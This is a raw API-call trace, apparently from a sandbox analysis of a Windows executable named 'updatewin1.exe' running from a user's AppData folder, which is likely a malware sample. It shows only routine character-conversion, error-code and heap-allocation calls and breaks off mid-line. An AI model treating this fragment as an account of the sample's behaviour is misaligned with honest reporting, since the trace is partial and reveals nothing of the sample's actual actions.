¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿV\x16\x93\x9a\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0181.683] GetLastError () returned 0x0 [0181.683] SetLastError (dwErrCode=0x0) [0181.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0181.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䰝髇㞕AĀ") returned 256 [0181.683] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䰝髇㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0181.683] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䰝髇㞕AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0181.683] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿV\x16\x93\x9a\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0181.684] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a580, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe")) returned 0x5f [0181.684] GetLastError () returned 0x0 [0181.684] SetLastError (dwErrCode=0x0) [0181.684] GetLastError () returned 0x0 [0181.684] SetLastError (dwErrCode=0x0) [0181.684] GetLastError () returned 0x0 [0181.684] SetLastError (dwErrCode=0x0) [0181.684] GetLastError () returned 0x0 [0181.684] SetLastError (dwErrCode=0x0) [0181.684] GetLastError () returned 0x0 [0181.685] SetLastError (dwErrCode=0x0) [0181.685] GetLastError () returned 0x0 [0181.685] SetLastError (dwErrCode=0x0) [0181.685] GetLastError () returned 0x0 [0181.685] SetLastError (dwErrCode=0x0) [0181.685] GetLastError () returned 0x0 [0181.685] SetLastError (dwErrCode=0x0) [0181.685] GetLastError () returned 0x0 [0181.685] SetLastError (dwErrCode=0x0) [0181.685] GetLastError () returned 0x0 [0181.685] SetLastError (dwErrCode=0x0) [0181.685] GetLastError () returned 0x0 [0181.685] SetLastError (dwErrCode=0x0) [0181.685] GetLastError () returned 0x0 [0181.685] SetLastError (dwErrCode=0x0) [0181.685] GetLastError () returned 0x0 [0181.685] SetLastError (dwErrCode=0x0) [0181.685] GetLastError () returned 0x0 [0181.686] SetLastError (dwErrCode=0x0) [0181.686] GetLastError () returned 0x0 [0181.686] SetLastError (dwErrCode=0x0) [0181.686] GetLastError () returned 0x0 [0181.686] SetLastError (dwErrCode=0x0) [0181.686] GetLastError () returned 0x0 [0181.686] SetLastError (dwErrCode=0x0) [0181.686] GetLastError () returned 0x0 [0181.686] SetLastError (dwErrCode=0x0) [0181.686] GetLastError () returned 0x0 [0181.686] SetLastError (dwErrCode=0x0) [0181.686] GetLastError () returned 0x0 [0181.686] SetLastError (dwErrCode=0x0) [0181.686] GetLastError () returned 0x0 [0181.686] SetLastError (dwErrCode=0x0) [0181.686] GetLastError () returned 0x0 [0181.687] SetLastError (dwErrCode=0x0) [0181.687] GetLastError () returned 0x0 [0181.687] SetLastError (dwErrCode=0x0) [0181.687] GetLastError () returned 0x0 [0181.687] SetLastError (dwErrCode=0x0) [0181.687] GetLastError () returned 0x0 [0181.687] SetLastError (dwErrCode=0x0) [0181.687] GetLastError () returned 0x0 [0181.687] SetLastError (dwErrCode=0x0) [0181.687] GetLastError () returned 0x0 [0181.687] SetLastError (dwErrCode=0x0) [0181.687] GetLastError () returned 0x0 [0181.687] SetLastError (dwErrCode=0x0) [0181.687] GetLastError () returned 0x0 [0181.687] SetLastError (dwErrCode=0x0) [0181.687] GetLastError () returned 0x0 [0181.688] SetLastError (dwErrCode=0x0) [0181.688] GetLastError () returned 0x0 [0181.688] SetLastError (dwErrCode=0x0) [0181.688] GetLastError () returned 0x0 [0181.688] SetLastError (dwErrCode=0x0) [0181.688] GetLastError () returned 0x0 [0181.688] SetLastError (dwErrCode=0x0) [0181.688] GetLastError () returned 0x0 [0181.688] SetLastError (dwErrCode=0x0) [0181.688] GetLastError () returned 0x0 [0181.688] SetLastError (dwErrCode=0x0) [0181.688] GetLastError () returned 0x0 [0181.688] SetLastError (dwErrCode=0x0) [0181.688] GetLastError () returned 0x0 [0181.688] SetLastError (dwErrCode=0x0) [0181.688] GetLastError () returned 0x0 [0181.689] SetLastError (dwErrCode=0x0) [0181.689] GetLastError () returned 0x0 [0181.689] SetLastError (dwErrCode=0x0) [0181.689] GetLastError () returned 0x0 [0181.689] SetLastError (dwErrCode=0x0) [0181.689] GetLastError () returned 0x0 [0181.689] SetLastError (dwErrCode=0x0) [0181.689] GetLastError () returned 0x0 [0181.689] SetLastError (dwErrCode=0x0) [0181.689] GetLastError () returned 0x0 [0181.689] SetLastError (dwErrCode=0x0) [0181.689] GetLastError () returned 0x0 [0181.689] SetLastError (dwErrCode=0x0) [0181.689] GetLastError () returned 0x0 [0181.689] SetLastError (dwErrCode=0x0) [0181.689] GetLastError () returned 0x0 [0181.690] SetLastError (dwErrCode=0x0) [0181.690] GetLastError () returned 0x0 [0181.690] SetLastError (dwErrCode=0x0) [0181.690] GetLastError () returned 0x0 [0181.690] SetLastError (dwErrCode=0x0) [0181.690] GetLastError () returned 0x0 [0181.690] SetLastError (dwErrCode=0x0) [0181.690] GetLastError () returned 0x0 [0181.690] SetLastError (dwErrCode=0x0) [0181.690] GetLastError () returned 0x0 [0181.690] SetLastError (dwErrCode=0x0) [0181.690] GetLastError () returned 0x0 [0181.690] SetLastError (dwErrCode=0x0) [0181.690] GetLastError () returned 0x0 [0181.690] SetLastError (dwErrCode=0x0) [0181.690] GetLastError () returned 0x0 [0181.691] SetLastError (dwErrCode=0x0) [0181.691] GetLastError () returned 0x0 [0181.691] SetLastError (dwErrCode=0x0) [0181.691] GetLastError () returned 0x0 [0181.691] SetLastError (dwErrCode=0x0) [0181.691] GetLastError () returned 0x0 [0181.691] SetLastError (dwErrCode=0x0) [0181.691] GetLastError () returned 0x0 [0181.691] SetLastError (dwErrCode=0x0) [0181.691] GetLastError () returned 0x0 [0181.691] SetLastError (dwErrCode=0x0) [0181.691] GetLastError () returned 0x0 [0181.691] SetLastError (dwErrCode=0x0) [0181.691] GetLastError () returned 0x0 [0181.691] SetLastError (dwErrCode=0x0) [0181.691] GetLastError () returned 0x0 [0181.691] SetLastError (dwErrCode=0x0) [0181.691] GetLastError () returned 0x0 [0181.692] SetLastError (dwErrCode=0x0) [0181.692] GetLastError () returned 0x0 [0181.692] SetLastError (dwErrCode=0x0) [0181.692] GetLastError () returned 0x0 [0181.692] SetLastError (dwErrCode=0x0) [0181.692] GetLastError () returned 0x0 [0181.692] SetLastError (dwErrCode=0x0) [0181.692] GetLastError () returned 0x0 [0181.692] SetLastError (dwErrCode=0x0) [0181.692] GetLastError () returned 0x0 [0181.692] SetLastError (dwErrCode=0x0) [0181.692] GetLastError () returned 0x0 [0181.692] SetLastError (dwErrCode=0x0) [0181.692] GetLastError () returned 0x0 [0181.692] SetLastError (dwErrCode=0x0) [0181.692] GetLastError () returned 0x0 [0181.693] SetLastError (dwErrCode=0x0) [0181.693] GetLastError () returned 0x0 [0181.693] SetLastError (dwErrCode=0x0) [0181.693] GetLastError () returned 0x0 [0181.693] SetLastError (dwErrCode=0x0) [0181.693] GetLastError () returned 0x0 [0181.693] SetLastError (dwErrCode=0x0) [0181.693] GetLastError () returned 0x0 [0181.693] SetLastError (dwErrCode=0x0) [0181.693] GetLastError () returned 0x0 [0181.693] SetLastError (dwErrCode=0x0) [0181.693] GetLastError () returned 0x0 [0181.693] SetLastError (dwErrCode=0x0) [0181.693] GetLastError () returned 0x0 [0181.693] SetLastError (dwErrCode=0x0) [0181.693] GetLastError () returned 0x0 [0181.694] SetLastError (dwErrCode=0x0) [0181.694] GetLastError () returned 0x0 [0181.694] SetLastError (dwErrCode=0x0) [0181.694] GetLastError () returned 0x0 [0181.694] SetLastError (dwErrCode=0x0) [0181.694] GetLastError () returned 0x0 [0181.694] SetLastError (dwErrCode=0x0) [0181.694] GetLastError () returned 0x0 [0181.694] SetLastError (dwErrCode=0x0) [0181.694] GetLastError () returned 0x0 [0181.694] SetLastError (dwErrCode=0x0) [0181.694] GetLastError () returned 0x0 [0181.694] SetLastError (dwErrCode=0x0) [0181.694] GetLastError () returned 0x0 [0181.695] SetLastError (dwErrCode=0x0) [0181.695] GetLastError () returned 0x0 [0181.695] SetLastError (dwErrCode=0x0) [0181.695] GetLastError () returned 0x0 [0181.695] SetLastError (dwErrCode=0x0) [0181.695] GetLastError () returned 0x0 [0181.695] SetLastError (dwErrCode=0x0) [0181.695] GetLastError () returned 0x0 [0181.695] SetLastError (dwErrCode=0x0) [0181.695] GetLastError () returned 0x0 [0181.695] SetLastError (dwErrCode=0x0) [0181.695] GetLastError () returned 0x0 [0181.695] SetLastError (dwErrCode=0x0) [0181.695] GetLastError () returned 0x0 [0181.695] SetLastError (dwErrCode=0x0) [0181.695] GetLastError () returned 0x0 [0181.695] SetLastError (dwErrCode=0x0) [0181.695] GetLastError () returned 0x0 [0181.696] SetLastError (dwErrCode=0x0) [0181.696] GetLastError () returned 0x0 [0181.696] SetLastError (dwErrCode=0x0) [0181.696] GetLastError () returned 0x0 [0181.696] SetLastError (dwErrCode=0x0) [0181.696] GetLastError () returned 0x0 [0181.696] SetLastError (dwErrCode=0x0) [0181.696] GetLastError () returned 0x0 [0181.696] SetLastError (dwErrCode=0x0) [0181.696] GetLastError () returned 0x0 [0181.696] SetLastError (dwErrCode=0x0) [0181.696] GetLastError () returned 0x0 [0181.696] SetLastError (dwErrCode=0x0) [0181.696] GetLastError () returned 0x0 [0181.697] SetLastError (dwErrCode=0x0) [0181.697] GetLastError () returned 0x0 [0181.697] SetLastError (dwErrCode=0x0) [0181.697] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x0, Size=0x74) returned 0x2051990 [0181.697] GetLastError () returned 0x0 [0181.697] SetLastError (dwErrCode=0x0) [0181.697] GetLastError () returned 0x0 [0181.697] SetLastError (dwErrCode=0x0) [0181.697] GetLastError () returned 0x0 [0181.697] SetLastError (dwErrCode=0x0) [0181.697] GetLastError () returned 0x0 [0181.697] SetLastError (dwErrCode=0x0) [0181.697] GetLastError () returned 0x0 [0181.697] SetLastError (dwErrCode=0x0) [0181.697] GetLastError () returned 0x0 [0181.697] SetLastError (dwErrCode=0x0) [0181.698] GetLastError () returned 0x0 [0181.698] SetLastError (dwErrCode=0x0) [0181.698] GetLastError () returned 0x0 [0181.698] SetLastError (dwErrCode=0x0) [0181.698] GetLastError () returned 0x0 [0181.698] SetLastError (dwErrCode=0x0) [0181.698] GetLastError () returned 0x0 [0181.698] SetLastError (dwErrCode=0x0) [0181.698] GetLastError () returned 0x0 [0181.698] SetLastError (dwErrCode=0x0) [0181.698] GetLastError () returned 0x0 [0181.698] SetLastError (dwErrCode=0x0) [0181.698] GetLastError () returned 0x0 [0181.698] SetLastError (dwErrCode=0x0) [0181.698] GetLastError () returned 0x0 [0181.698] SetLastError (dwErrCode=0x0) [0181.698] GetLastError () returned 0x0 [0181.699] SetLastError (dwErrCode=0x0) [0181.699] GetLastError () returned 0x0 [0181.699] SetLastError (dwErrCode=0x0) [0181.699] GetLastError () returned 0x0 [0181.699] SetLastError (dwErrCode=0x0) [0181.699] GetLastError () returned 0x0 [0181.699] SetLastError (dwErrCode=0x0) [0181.699] GetLastError () returned 0x0 [0181.699] SetLastError (dwErrCode=0x0) [0181.699] GetLastError () returned 0x0 [0181.699] SetLastError (dwErrCode=0x0) [0181.699] GetLastError () returned 0x0 [0181.699] SetLastError (dwErrCode=0x0) [0181.699] GetLastError () returned 0x0 [0181.699] SetLastError (dwErrCode=0x0) [0181.699] GetLastError () returned 0x0 [0181.700] SetLastError (dwErrCode=0x0) [0181.700] GetLastError () returned 0x0 [0181.700] SetLastError (dwErrCode=0x0) [0181.700] GetLastError () returned 0x0 [0181.700] SetLastError (dwErrCode=0x0) [0181.700] GetLastError () returned 0x0 [0181.700] SetLastError (dwErrCode=0x0) [0181.700] GetLastError () returned 0x0 [0181.700] SetLastError (dwErrCode=0x0) [0181.700] GetLastError () returned 0x0 [0181.700] SetLastError (dwErrCode=0x0) [0181.700] GetLastError () returned 0x0 [0181.700] SetLastError (dwErrCode=0x0) [0181.700] GetLastError () returned 0x0 [0181.701] SetLastError (dwErrCode=0x0) [0181.701] GetLastError () returned 0x0 [0181.701] SetLastError (dwErrCode=0x0) [0181.701] GetLastError () returned 0x0 [0181.701] SetLastError (dwErrCode=0x0) [0181.701] GetLastError () returned 0x0 [0181.701] SetLastError (dwErrCode=0x0) [0181.701] GetLastError () returned 0x0 [0181.701] SetLastError (dwErrCode=0x0) [0181.701] GetLastError () returned 0x0 [0181.701] SetLastError (dwErrCode=0x0) [0181.701] GetLastError () returned 0x0 [0181.701] SetLastError (dwErrCode=0x0) [0181.701] GetLastError () returned 0x0 [0181.702] SetLastError (dwErrCode=0x0) [0181.702] GetLastError () returned 0x0 [0181.702] SetLastError (dwErrCode=0x0) [0181.702] GetLastError () returned 0x0 [0181.702] SetLastError (dwErrCode=0x0) [0181.702] GetLastError () returned 0x0 [0181.702] SetLastError (dwErrCode=0x0) [0181.702] GetLastError () returned 0x0 [0181.702] SetLastError (dwErrCode=0x0) [0181.702] GetLastError () returned 0x0 [0181.702] SetLastError (dwErrCode=0x0) [0181.702] GetLastError () returned 0x0 [0181.702] SetLastError (dwErrCode=0x0) [0181.702] GetLastError () returned 0x0 [0181.702] SetLastError (dwErrCode=0x0) [0181.702] GetLastError () returned 0x0 [0181.702] SetLastError (dwErrCode=0x0) [0181.703] GetLastError () returned 0x0 [0181.703] SetLastError (dwErrCode=0x0) [0181.703] GetLastError () returned 0x0 [0181.703] SetLastError (dwErrCode=0x0) [0181.703] GetLastError () returned 0x0 [0181.703] SetLastError (dwErrCode=0x0) [0181.703] GetLastError () returned 0x0 [0181.703] SetLastError (dwErrCode=0x0) [0181.703] GetLastError () returned 0x0 [0181.703] SetLastError (dwErrCode=0x0) [0181.703] GetLastError () returned 0x0 [0181.703] SetLastError (dwErrCode=0x0) [0181.703] GetLastError () returned 0x0 [0181.703] SetLastError (dwErrCode=0x0) [0181.703] GetLastError () returned 0x0 [0181.703] SetLastError (dwErrCode=0x0) [0181.703] GetLastError () returned 0x0 [0181.704] SetLastError (dwErrCode=0x0) [0181.704] GetLastError () returned 0x0 [0181.704] SetLastError (dwErrCode=0x0) [0181.704] GetLastError () returned 0x0 [0181.704] SetLastError (dwErrCode=0x0) [0181.704] GetLastError () returned 0x0 [0181.704] SetLastError (dwErrCode=0x0) [0181.704] GetLastError () returned 0x0 [0181.704] SetLastError (dwErrCode=0x0) [0181.704] GetLastError () returned 0x0 [0181.704] SetLastError (dwErrCode=0x0) [0181.704] GetLastError () returned 0x0 [0181.736] SetLastError (dwErrCode=0x0) [0181.736] GetLastError () returned 0x0 [0181.736] SetLastError (dwErrCode=0x0) [0181.736] GetLastError () returned 0x0 [0181.737] SetLastError (dwErrCode=0x0) [0181.737] GetLastError () returned 0x0 [0181.737] SetLastError (dwErrCode=0x0) [0181.737] GetLastError () returned 0x0 [0181.737] SetLastError (dwErrCode=0x0) [0181.737] GetLastError () returned 0x0 [0181.737] SetLastError (dwErrCode=0x0) [0181.737] GetLastError () returned 0x0 [0181.737] SetLastError (dwErrCode=0x0) [0181.737] GetLastError () returned 0x0 [0181.737] SetLastError (dwErrCode=0x0) [0181.737] GetLastError () returned 0x0 [0181.737] SetLastError (dwErrCode=0x0) [0181.737] GetLastError () returned 0x0 [0181.737] SetLastError (dwErrCode=0x0) [0181.737] GetLastError () returned 0x0 [0181.737] SetLastError (dwErrCode=0x0) [0181.738] GetLastError () returned 0x0 [0181.738] SetLastError (dwErrCode=0x0) [0181.738] GetLastError () returned 0x0 [0181.738] SetLastError (dwErrCode=0x0) [0181.738] GetLastError () returned 0x0 [0181.738] SetLastError (dwErrCode=0x0) [0181.738] GetLastError () returned 0x0 [0181.738] SetLastError (dwErrCode=0x0) [0181.738] GetLastError () returned 0x0 [0181.738] SetLastError (dwErrCode=0x0) [0181.738] GetLastError () returned 0x0 [0181.738] SetLastError (dwErrCode=0x0) [0181.738] GetLastError () returned 0x0 [0181.738] SetLastError (dwErrCode=0x0) [0181.738] GetLastError () returned 0x0 [0181.738] SetLastError (dwErrCode=0x0) [0181.738] GetLastError () returned 0x0 [0181.738] SetLastError (dwErrCode=0x0) [0181.738] GetLastError () returned 0x0 [0181.739] SetLastError (dwErrCode=0x0) [0181.739] GetLastError () returned 0x0 [0181.739] SetLastError (dwErrCode=0x0) [0181.739] GetLastError () returned 0x0 [0181.739] SetLastError (dwErrCode=0x0) [0181.739] GetLastError () returned 0x0 [0181.739] SetLastError (dwErrCode=0x0) [0181.739] GetLastError () returned 0x0 [0181.739] SetLastError (dwErrCode=0x0) [0181.739] GetLastError () returned 0x0 [0181.739] SetLastError (dwErrCode=0x0) [0181.739] GetLastError () returned 0x0 [0181.739] SetLastError (dwErrCode=0x0) [0181.739] GetLastError () returned 0x0 [0181.739] SetLastError (dwErrCode=0x0) [0181.739] GetLastError () returned 0x0 [0181.739] SetLastError (dwErrCode=0x0) [0181.739] GetLastError () returned 0x0 [0181.739] SetLastError (dwErrCode=0x0) [0181.739] GetLastError () returned 0x0 [0181.740] SetLastError (dwErrCode=0x0) [0181.740] GetLastError () returned 0x0 [0181.740] SetLastError (dwErrCode=0x0) [0181.740] GetLastError () returned 0x0 [0181.740] SetLastError (dwErrCode=0x0) [0181.740] GetLastError () returned 0x0 [0181.740] SetLastError (dwErrCode=0x0) [0181.740] GetLastError () returned 0x0 [0181.740] SetLastError (dwErrCode=0x0) [0181.740] GetLastError () returned 0x0 [0181.740] SetLastError (dwErrCode=0x0) [0181.740] GetLastError () returned 0x0 [0181.740] SetLastError (dwErrCode=0x0) [0181.740] GetLastError () returned 0x0 [0181.740] SetLastError (dwErrCode=0x0) [0181.740] GetLastError () returned 0x0 [0181.740] SetLastError (dwErrCode=0x0) [0181.740] GetLastError () returned 0x0 [0181.740] SetLastError (dwErrCode=0x0) [0181.740] GetLastError () returned 0x0 [0181.741] SetLastError (dwErrCode=0x0) [0181.741] GetLastError () returned 0x0 [0181.741] SetLastError (dwErrCode=0x0) [0181.741] GetLastError () returned 0x0 [0181.741] SetLastError (dwErrCode=0x0) [0181.741] GetLastError () returned 0x0 [0181.741] SetLastError (dwErrCode=0x0) [0181.741] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x98) returned 0x2051a10 [0181.741] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x1f) returned 0x2051ab0 [0181.741] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x36) returned 0x2051ad8 [0181.741] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x37) returned 0x2051b18 [0181.741] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x3c) returned 0x2051b58 [0181.741] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x31) returned 0x2051ba0 [0181.741] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x17) returned 0x2051be0 [0181.741] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x24) returned 0x2051c00 [0181.741] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x14) returned 0x2051c30 [0181.741] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0xd) returned 0x2051c50 [0181.741] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x25) returned 0x2051c68 [0181.741] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x39) returned 0x2051c98 [0181.741] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x18) returned 0x2051ce0 [0181.741] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x17) returned 0x2051d00 [0181.741] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0xe) returned 0x2051d20 [0181.741] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x69) returned 0x2051d38 [0181.741] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x3e) returned 0x2051db0 [0181.741] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x1b) returned 0x2051df8 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x1d) returned 0x2051e20 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x48) returned 0x2051e48 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x12) returned 0x2051e98 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x18) returned 0x2051eb8 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x1b) returned 0x2051ed8 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x24) returned 0x2051f00 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, Size=0x29) returned 0x2051f30 [0181.742] RtlAllocateHeap (HeapHandle=0x2050000, Flags=0x8, 